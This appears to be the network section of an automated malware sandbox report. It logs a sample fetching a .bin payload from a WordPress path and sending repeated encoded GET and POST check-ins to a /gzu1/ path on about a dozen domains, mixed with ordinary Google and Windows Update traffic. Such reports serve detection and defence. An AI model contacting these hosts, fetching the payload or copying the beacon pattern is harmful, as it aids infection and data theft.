Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGLafzrEGIjBT_EUKA1u8_t9vjN9UnmJR1K8IADZGF2jLdWpWbLfOyPU11p8YoYWauUFitc_MPvgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-13; NID=513=irRFUUIJFTw_X5vpGLyxNvjQ9lchlx96W2dFZ55OuLCLz6OAMx0ZChLKYWEmc7DJIz9qvPHZKcKrD_cp_Nu_SmSjzyQLeI0P2KT7rTufjJ_cjA2GUdoNR7K3XuwX4_yU_ilvq8K0Ck-50ZvOefEBewlxLXWhTzyb0vrnlzTubcM
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGLifzrEGIjAtAotW97xiDhn6fwnyvQS7r43dpv7E1GI8YkXR8lHG-pScMOWVMJEg8fQ1Eg1M3M4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-13; NID=513=XfXV4_tsLPb6EjW6TVfsKn-ZgtB4UhCNxFBqj-b0yxPVScwjuwN2NcTb1-gHst4PYm3HzPo4t9ndFw7SoXtrkpmSxptWu7n5PzzOZ3Qf57iMOVZNeg_M3XDxL2A5O6ZgR-iNgDFm06y0Qis0KL_8PqzkuJMzAVPq5gZ28u_0vPQ
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T7KOr9ydN2KLoTb&MD=zvmYUGVF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T7KOr9ydN2KLoTb&MD=zvmYUGVF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /wp-includes/pLykMdE/ZIbbdBq101.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: thequirkyartman.co.ukCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=S3P2x5ip62J7+Oy/khyvyepdpnn6OsRBEClp69tTyp5C0OExptGWhV1rUv2ZsdonVFK5TsIP8T+xoHN8zHMPLILivDQ16J/iew4jcSCgqKm6zoWIRy2zzVk=&Y0H=66WP HTTP/1.1Host: www.vegus24.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=VT8K0v27N5bGcxCaj+YYD9yKQ06FddJKrderC5Pcma0WiavcK12ZIFD1KaFj6jAJAc5C6yt/FybBtASqq9iUhSi+wlWN91M6kc0r7o/QXgUEGL9jkgBqabg=&Y0H=66WP HTTP/1.1Host: www.holein1sa.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=KINnc6YGk8HV8ei39HElS4I1DjF/UhmuqXZgjVMGlWHMmd+U6gw6qLbNy3URNR7Ucze4YdZnZ4EfPoI0+cgnC/yXbL3Ii5JH3BdQoxHuvJDFjkEgUbJI9tc=&Y0H=66WP HTTP/1.1Host: www.luckydomainz.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=Nc0+1pbABO8bD/b9Wv0Sz/i9XafwHDVY8M6N2p8pgISzJF1z8hz/2TN9JRK2WZ6dwSE5fOiQX7UBBH0PbssqVTyxxREEszEt/mQOHjL8tipl5lQA7LzYQXo=&Y0H=66WP HTTP/1.1Host: www.qdzdvrk.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=qHrU/ycFjG31mFHi/zg+n8+l32EylT8zNFfCUKb22Nc1EMRw4DAgdGnBBmRrxsDJ2EJ0WhI3vZ6+3kEV8pm1/TOgq31Qtmfxg5HCN3XsFKKvE88rt5vqtco=&Y0H=66WP HTTP/1.1Host: www.cngdesk.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=kn3Ys08AlLLcTB8c3mh/ndv1lRtAG+6GF4y4CDUXNC25SpPwtUp0dEf6cWyblfDnSRkBocYG/2n1J5W5fw7V+kx237huy5oCC9wi7uOTnETtOi+sV7JzakA=&Y0H=66WP HTTP/1.1Host: www.shevgin.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic	HTTP traffic detected: GET /gzu1/?7Br4wVx=DZKnd6OrhyjSh2P2xCOvgjG8rz+hGzA4eaP9rB/8/NwqVRaBiTGrNKLJLz7ywVDYeyRbngiLRWWycf7Qti6/6bHZgHdFcdMy6ZljqO/4pGth4X6Se5W+Nzg=&Y0H=66WP HTTP/1.1Host: www.wrgardenrooms.co.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: thequirkyartman.co.uk
Source: global traffic	DNS traffic detected: DNS query: www.vegus24.org
Source: global traffic	DNS traffic detected: DNS query: www.maerealtysg.com
Source: global traffic	DNS traffic detected: DNS query: www.holein1sa.com
Source: global traffic	DNS traffic detected: DNS query: www.luckydomainz.shop
Source: global traffic	DNS traffic detected: DNS query: www.qdzdvrk.shop
Source: global traffic	DNS traffic detected: DNS query: www.cngdesk.com
Source: global traffic	DNS traffic detected: DNS query: www.golfscorecardus.com
Source: global traffic	DNS traffic detected: DNS query: www.theertyuiergthjk.homes
Source: global traffic	DNS traffic detected: DNS query: www.shevgin.top
Source: global traffic	DNS traffic detected: DNS query: www.sfebg.com
Source: global traffic	DNS traffic detected: DNS query: www.wrgardenrooms.co.uk

Source: unknown

HTTP traffic detected: POST /gzu1/ HTTP/1.1Host: www.holein1sa.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 204Origin: http://www.holein1sa.comReferer: http://www.holein1sa.com/gzu1/User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0Data Raw: 37 42 72 34 77 56 78 3d 59 52 55 71 33 59 53 6b 50 61 43 44 65 48 65 39 71 4e 4a 76 65 2b 61 54 44 6d 54 47 4d 64 63 57 73 75 57 70 4a 4f 48 4e 69 4b 34 2f 70 62 4c 4a 42 79 75 2f 4e 6c 71 6e 50 72 4a 7a 67 53 59 65 47 37 5a 6e 78 67 46 74 64 48 54 47 6d 6a 7a 35 6c 50 75 69 6c 78 4b 75 31 6c 57 6d 6c 58 51 47 67 75 39 34 37 71 36 75 50 51 35 62 66 74 6c 58 6b 42 6f 57 62 36 6a 43 4d 55 6d 75 4b 4f 74 66 62 72 4f 69 66 4f 4e 37 52 35 34 43 71 77 51 7a 39 64 46 64 43 35 6d 37 6a 2f 73 38 59 73 33 46 44 57 36 4c 48 79 61 70 43 77 76 68 74 76 74 6d 64 30 6e 77 6a 6f 33 57 79 77 6c 32 4f 67 53 65 66 41 3d 3d Data Ascii: 7Br4wVx=YRUq3YSkPaCDeHe9qNJve+aTDmTGMdcWsuWpJOHNiK4/pbLJByu/NlqnPrJzgSYeG7ZnxgFtdHTGmjz5lPuilxKu1lWmlXQGgu947q6uPQ5bftlXkBoWb6jCMUmuKOtfbrOifON7R54CqwQz9dFdC5m7j/s8Ys3FDW6LHyapCwvhtvtmd0nwjo3Wywl2OgSefA==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 13:08:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 32 30 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 54 3d 8f d3 40 10 ed f3 2b 06 a7 81 c2 f1 07 89 94 33 be 34 7c 94 70 45 c4 89 72 ec 1d c7 ab b3 bd 66 77 9d 23 20 24 44 75 fc 07 28 8e 92 8a 86 96 3f 83 38 e9 fe 05 bb b1 8f c4 91 75 27 9d 0b 7f bc 79 3b 6f 77 de 8c e3 07 cf 5e 3d 5d be 39 79 0e b9 2e 8b c5 28 be 79 10 b2 c5 08 cc 15 97 a4 11 d2 1c a5 22 7d ec 34 3a 73 e7 0e 78 5d 50 73 5d d0 e2 a5 d0 f0 42 34 15 83 87 e3 a9 3f 7d 14 7b 2d 3e 6a 33 28 bd 31 a4 ed bb bd 12 c1 36 f0 e1 ff a7 85 32 51 e9 08 2a 21 4b 2c e0 a8 d6 e0 bc 26 c9 b0 42 e7 49 8f 97 8a 42 c8 08 c6 be ef f7 03 09 a6 67 2b 69 b7 60 a2 59 96 ed a2 1f db 4d 58 95 3c b8 4d 36 98 df ad 9b 1d ea 96 28 57 bc 72 13 a1 b5 28 23 98 cc a8 1c 96 0e 6f 95 9e de 2d 3d 37 67 be b7 fa e3 41 f5 44 14 0c 82 60 58 7b af 6e f5 e0 ea 7b ba b5 97 77 b2 26 a9 b8 a8 0e d2 77 26 af 24 6e fa 26 db 2e 71 15 7f 4f 11 18 af 0e 1a 40 48 46 d2 d5 a2 8e 20 a8 df 81 12 05 67 30 46 c4 3e af 46 c6 78 b5 ea 88 fb 6e d9 0e 39 b0 33 e8 bb 69 19 b1 d7 75 73 ec e5 db 19 19 c5 b6 9f bb 71 c8 83 81 59 30 60 3b 07 79 b8 b8 be fc 75 fd ed fb d5 d7 1f 57 5f 7e ff bd f8 f9 e7 d3 67 93 27 ec e2 f5 6e 46 96 39 01 26 62 4d 40 52 0a 09 22 4d 1b 29 89 c1 79 ce 0b 02 6d c2 a7 94 80 22 69 6a 08 e7 a8 a0 96 22 25 a5 cc d9 60 23 1a 09 92 de 36 a4 f4 a4 95 f6 ba dc f1 9e c6 49 41 a8 08 52 53 55 4c 35 34 0a 78 66 d7 9a ec bc 3a b3 77 83 28 c0 1b 95 ed 4e 26 b0 cc d1 44 0d ef 30 35 e3 6b 48 0b 54 ea d8 e9 8c 75 76 07 0a fd 70 ea fa 33 d7 0f 21 0c 22 7f 1e cd 8e da 72 9a 55 3b 96 85 5a b8 2d aa 29 ce f6 b7 64 b1 7f 08 bf 35 fe ab 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 208T=@+34\|pErfw# $Du(?8u'y;ow^=]9y.(y"}4:sx]Ps]B4?}{->j3(162Q*!K,&BIBg+i`YMX<M6(Wr(#o-=7gAD`X{n{w&w&$n&.qO@HF g0F>Fxn93iusqY0`;yuW_~g'nF9&bM@R"M)ym"ij"%`#6IARSUL54xf:w(N&D05kHTuvp3!"rU;Z-)d50
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 13:09:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 32 30 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 54 bd 8e d3 40 10 ee f3 14 83 d3 40 e1 f8 87 9c 94 33 be 34 fc 94 70 45 04 a2 1c 7b c7 f1 ea 6c af d9 5d e7 08 08 09 51 1d ef 00 05 94 54 34 b4 bc 0c e2 a4 7b 0b 76 6d 1f 89 23 eb 4e ba 2d ec f5 7c 33 f3 ed ce 37 e3 f8 de 93 17 8f 57 af 4f 9f 42 ae cb 62 39 89 af 5f 84 6c 39 01 b3 e2 92 34 42 9a a3 54 a4 4f 9c 46 67 ee c2 01 af 07 35 d7 05 2d 9f 0b 0d cf 44 53 31 b8 3f 9d fb f3 07 b1 d7 d9 27 5d 06 a5 b7 c6 a9 dd db 95 08 b6 85 f7 ff 3f ad 29 13 95 8e a0 12 b2 c4 02 8e 6b 0d ce 4b 92 0c 2b 74 1e 0d fc 52 51 08 19 c1 d4 f7 fd 21 90 60 7a b6 96 f6 08 06 cd b2 6c 87 7e e8 0e 61 59 f2 e0 26 da 60 71 3b 6f 76 c8 5b a2 5c f3 ca 4d 84 d6 a2 8c 60 76 44 e5 38 75 78 23 f5 fc 76 ea 85 b9 f3 9d d9 1f 8e b2 27 a2 60 10 04 e3 dc 7b 75 ab 47 a3 ef a8 d6 5e de d9 86 a4 e2 a2 3a 48 df 8b bc 96 b8 1d 8a 6c bb c4 55 fc 1d 45 60 b4 3a 68 00 21 19 49 57 8b 3a 82 a0 7e 0b 4a 14 9c c1 14 11 87 7e 35 32 c6 ab 75 ef b8 af 96 ed 90 03 39 83 a1 9a d6 23 f6 fa 6e 8e bd bc 9d 91 49 6c fb b9 1f 87 3c 18 99 05 63 ec e6 20 0f 97 57 df 7e 5d 7d fd 7e f9 e5 c7 e5 e7 df 7f 2f 7e fe f9 f8 c9 e4 09 7b bc de cd c8 2a 27 c0 44 6c 08 48 4a 21 41 a4 69 23 25 31 38 cf 79 41 a0 0d fc 8a 12 50 24 4d 0d e1 1c 15 d4 52 a4 a4 94 b9 1b 6c 45 23 41 d2 9b 86 94 9e 75 d4 5e 9f 3b de e3 38 2d 08 15 41 6a aa 8a a9 86 46 01 cf 6c ac c9 ce ab 33 fb 34 16 05 78 cd d2 9e 64 06 ab 1c 0d 6a fc 0e 53 33 be 81 b4 40 a5 4e 9c 5e 58 67 77 a1 d0 0f e7 ae 7f e4 fa 21 84 41 e4 1f 47 66 d3 96 d3 44 ed bc ac a9 33 77 45 35 c5 69 7f 4b d6 f6 0f c2 80 8c 9b ab 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 208T@@34pE{l]QT4{vm#N-\|37WOBb9_l94BTOFg5-DS1?']?)kK+tRQ!`zl~aY&`q;ov[\M`vD8ux#v'`{uG^:HlUE`:h!IW:~J~52u9#nIl<c W~]}~/~{*'DlHJ!Ai#%18yAP$MRlE#Au^;8-AjFl34xdjS3@N^Xgw!AGfD3wE5iK0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 13:09:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 34 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 38 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 38 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 33 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 62 6f 6c 64 20 31 31 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 70 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 20 20 20 20 3c 68 32 3e e9 a1 b5 e9 9d a2 e6 9c aa e6 89 be e5 88 b0 e3 80 82 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 13:09:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 13:09:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 13:09:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
